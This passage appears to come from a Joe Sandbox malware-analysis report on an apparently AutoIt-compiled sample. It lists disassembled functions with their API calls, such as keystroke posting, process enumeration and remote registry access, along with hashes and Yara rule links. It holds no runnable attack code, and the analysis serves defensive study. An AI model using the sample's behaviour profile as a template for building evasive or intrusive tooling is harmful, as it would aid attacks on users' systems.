                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009C3CA4
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009C3CC1
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009C3D05
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009C3D26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                    • Instruction ID: 85978164d5f79c51bd044118231c4e1752b319a5ccd919f7eeb0220f5dd225f8
                                    • Opcode Fuzzy Hash: ca0403bcf45d9c5f96c2104b719a34a9bbf989b03d3ee58292e2d9d84bd3e649
                                    • Instruction Fuzzy Hash: B151F6A1E487D53DFB3283648C55FBABE9D6B06300F0CC48CE4D6568C2D695EE84D762
                                    Function 009C7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                    • Instruction ID: def2745a575be41be06123f9c5c7bbe99638a9562261d2c3eaff9152b3131566
                                    • Opcode Fuzzy Hash: 6d97b6ff4558afb2ee1e3353088e0809f716b662813cb15b622d3edd387ac4c3
                                    • Instruction Fuzzy Hash: 46417166C1021476DF10EBF8C886BCFB7ACDF86710F50896AE514E3122FA35E61487E6
                                    Function 009E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E8FE7
                                    • GetWindowLongW.USER32(00C89FA0,000000F0), ref: 009E901A
                                    • GetWindowLongW.USER32(00C89FA0,000000F0), ref: 009E904F
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009E9081
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E90AB
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 009E90BC
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E90D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                    • Instruction ID: d2afda25ed2b9391f047838a2315b16ec9b36f1ff3bd79ec3238ea83f7e3cd20
                                    • Opcode Fuzzy Hash: db5a20edd1aad7af8c448ee04840a75167953c9d8a81d0738db6ace3d8a6a6c3
                                    • Instruction Fuzzy Hash: 4D316479210254EFDB22CF99DC84F6477A9FB8A315F150164F5098B2B2CB72AC42CB40
                                    Function 009C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C08F2
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C0918
                                    • SysAllocString.OLEAUT32(00000000), ref: 009C091B
                                    • SysAllocString.OLEAUT32(?), ref: 009C0939
                                    • SysFreeString.OLEAUT32(?), ref: 009C0942
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0967
                                    • SysAllocString.OLEAUT32(?), ref: 009C0975
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: eb6d2aeafe1b0d7fa4b1b27eee3f9e008a4d95c21fa6321381fc176f82510437
                                    • Instruction ID: 2d3e2d2f08625d4f6f43df9eab478e345f90e8aabb4fba0c731e019f416427c8
                                    • Opcode Fuzzy Hash: eb6d2aeafe1b0d7fa4b1b27eee3f9e008a4d95c21fa6321381fc176f82510437
                                    • Instruction Fuzzy Hash: F2218376A01219AFEF10DFACCC88EBB73ECEB49360B408525F915DB161D674EC468B61
                                    Function 009C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 7e7f4e712de6cf89a71945f0871e1a2b358041a722b9f8c455a6349117d3c9eb
                                    • Instruction ID: 0027f18cb83065012bdaf05a8fd9129bf2e34517d8457c2f10c381499f1a84e5
                                    • Opcode Fuzzy Hash: 7e7f4e712de6cf89a71945f0871e1a2b358041a722b9f8c455a6349117d3c9eb
                                    • Instruction Fuzzy Hash: 9D216E7250455177D724B7389C12FBB73ACEFA5310F10442DF44597182E7699941C3E7
                                    Function 009C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09CB
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009C09F1
                                    • SysAllocString.OLEAUT32(00000000), ref: 009C09F4
                                    • SysAllocString.OLEAUT32 ref: 009C0A15
                                    • SysFreeString.OLEAUT32 ref: 009C0A1E
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009C0A38
                                    • SysAllocString.OLEAUT32(?), ref: 009C0A46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: c771e63648ca8d703ce0ca295b607f75771554f6cb83a271450f0da7aae2d060
                                    • Instruction ID: 2d5488cff8189900c7a3784688dd9daf57b1f43be9896c2ecedb7f8d679356ad
                                    • Opcode Fuzzy Hash: c771e63648ca8d703ce0ca295b607f75771554f6cb83a271450f0da7aae2d060
                                    • Instruction Fuzzy Hash: 6C215676600204AFDB10DFE8DC89EBAB7ECEF48360B40C129F909CB261D674EC468765
                                    Function 009EA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009EA32D
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009EA33A
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009EA345
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009EA354
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009EA360
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                    • Instruction ID: 553966283258533e690741716308d7b58b11a4a2eaab215765eccfec496a2df7
                                    • Opcode Fuzzy Hash: 57da5e55753d5cd196652b673611fb965ce430383a02ffa365bfaff54cf753e7
                                    • Instruction Fuzzy Hash: DE1193B115011DBEEF159FA5CC85EE77F6DFF09798F014115BA04A6060C672AC22DBA4
                                    Function 0099CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0099CCF6
                                    • GetWindowRect.USER32(?,?), ref: 0099CD37
                                    • ScreenToClient.USER32(?,?), ref: 0099CD5F
                                    • GetClientRect.USER32(?,?), ref: 0099CE8C
                                    • GetWindowRect.USER32(?,?), ref: 0099CEA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                    • Instruction ID: 114bfdf062bfa95b7fa75f094b20811667b2f487f1daebcaf61e43907060ccb7
                                    • Opcode Fuzzy Hash: 4fe51f2d18c78631ec1babb1004b06239257c12cd1d46eae45104b0023c915fa
                                    • Instruction Fuzzy Hash: D5B14BB9A00249DBDF10CFA8C8807EDB7B5FF08350F149529ED5AAB254DB34AD51CB64
                                    Function 009E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 009E1C18
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 009E1C26
                                    • __wsplitpath.LIBCMT ref: 009E1C54
                                      • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
                                    • _wcscat.LIBCMT ref: 009E1C69
                                    • Process32NextW.KERNEL32(00000000,?), ref: 009E1CDF
                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 009E1CF1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID:
                                    • API String ID: 1380811348-0
                                    • Opcode ID: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                    • Instruction ID: 61e4628414fef761a4c7e737a2ad7834bfedcb1fc59b233c5e67ab3d39ce59d2
                                    • Opcode Fuzzy Hash: 7bd9d1400dedf237594bd0390b0b8ceb4c5c51728b501939481b50df8db85da7
                                    • Instruction Fuzzy Hash: 30513BB25043449FD721EF64C885FABB7ECAF88754F00491EF58696291EB70A905CBA2
                                    Function 009E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E30AF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E30EF
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009E3112
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009E313B
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009E317E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E318B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 3451389628-0
                                    • Opcode ID: 72386157cdff07e47c4867b12cd6c92ea8be7703d3cf1fb0ad2dfefcc208fd4f
                                    • Instruction ID: 61443ea71a3ad0b903f8f64875b828be4b9f67dcc14a841172bb729e6e3f3e3a
                                    • Opcode Fuzzy Hash: 72386157cdff07e47c4867b12cd6c92ea8be7703d3cf1fb0ad2dfefcc208fd4f
                                    • Instruction Fuzzy Hash: 12516872608344AFC705EF65C895E6ABBE9FF88304F04891DF556872A1DB31EA05CB52
                                    Function 009E84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 009E8540
                                    • GetMenuItemCount.USER32(00000000), ref: 009E8577
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009E859F
                                    • GetMenuItemID.USER32(?,?), ref: 009E860E
                                    • GetSubMenu.USER32(?,?), ref: 009E861C
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 009E866D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: f9f72c4b93c5b8ac38befda20392fd964860a1803e00a488e36564cd948e0fb3
                                    • Instruction ID: 0abe8db058dc3f7b1a948fc969f760f68ddfb33a225f2c78875f44994407978f
                                    • Opcode Fuzzy Hash: f9f72c4b93c5b8ac38befda20392fd964860a1803e00a488e36564cd948e0fb3
                                    • Instruction Fuzzy Hash: 79518D71A00219AFCF12EF95C945AAEB7F4FF88710F104499E91ABB351DF30AE418B91
                                    Function 009C4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C4B10
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C4B5B
                                    • IsMenu.USER32(00000000), ref: 009C4B7B
                                    • CreatePopupMenu.USER32 ref: 009C4BAF
                                    • GetMenuItemCount.USER32(000000FF), ref: 009C4C0D
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009C4C3E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                    • Instruction ID: 05c2b6f1a5b1448c8f151f11cc48d50b9106bb51ae4758cf84c9c2e67d2a73b4
                                    • Opcode Fuzzy Hash: 847d6b7f9f409a694ec21c6d4ec2ec11e45403eb2f1ce318875ec28991f43d2a
                                    • Instruction Fuzzy Hash: 02519B70F01209EBDF20CFA8D898FEDBBF8AF45318F14415DE8959A2A1D3719945CB52
                                    Function 009D8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00A1DC00), ref: 009D8E7C
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8E89
                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 009D8EAD
                                    • 733F1E40.WSOCK32(?,?,00000000,00000000), ref: 009D8EC5
                                    • _strlen.LIBCMT ref: 009D8EF7
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8F6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_strlenselect
                                    • String ID:
                                    • API String ID: 2217125717-0
                                    • Opcode ID: 6c5c99ccb3dd5e4c31ed24afbe77a1fd5c50f92d5260e3a5e3e56329afc00d21
                                    • Instruction ID: ca21a60831975bf5313ca849c2084f2b2b334e1522d976edfe85ba491a1d6259
                                    • Opcode Fuzzy Hash: 6c5c99ccb3dd5e4c31ed24afbe77a1fd5c50f92d5260e3a5e3e56329afc00d21
                                    • Instruction Fuzzy Hash: 96417371500104ABCB14EBA8CD95FAEB7BDAF98314F10855AF516973D2DF34AE40CB60
                                    Function 0099ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • BeginPaint.USER32(?,?,?), ref: 0099AC2A
                                    • GetWindowRect.USER32(?,?), ref: 0099AC8E
                                    • ScreenToClient.USER32(?,?), ref: 0099ACAB
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0099ACBC
                                    • EndPaint.USER32(?,?,?,?,?), ref: 0099AD06
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009FE673
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 2592858361-0
                                    • Opcode ID: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                    • Instruction ID: 0886309d1186d4775d75128a2e825c86dc7fdc367c65b1977dd65da5a6b06a30
                                    • Opcode Fuzzy Hash: fba75e83aca8dabda95d414ea9e77c3b5314e8e5c8a788febee6be01803d1de6
                                    • Instruction Fuzzy Hash: 4D41B6751043049FCB11DF58DC84F767BE8EB99320F140669FA94872A1D7359C86DBA2
                                    Function 009EE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(00A41628,00000000,00A41628,00000000,00000000,00A41628,?,009FDC5D,00000000,?,00000000,00000000,00000000,?,009FDAD1,00000004), ref: 009EE40B
                                    • EnableWindow.USER32(00000000,00000000), ref: 009EE42F
                                    • ShowWindow.USER32(00A41628,00000000), ref: 009EE48F
                                    • ShowWindow.USER32(00000000,00000004), ref: 009EE4A1
                                    • EnableWindow.USER32(00000000,00000001), ref: 009EE4C5
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009EE4E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                    • Instruction ID: 0a40cb1a447b16a64ab2d2910818d05c69cca61b99a557c17aab19906d598902
                                    • Opcode Fuzzy Hash: 40d6f92d899a93c496a1d1a5db9f7d9344110e2254964dd231f86c2757dd8e81
                                    • Instruction Fuzzy Hash: F2415B31601584EFEB23CF69C499B947BE5BF09304F1881A9EA588F2F2D731AC42CB51
                                    Function 009C98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 009C98D1
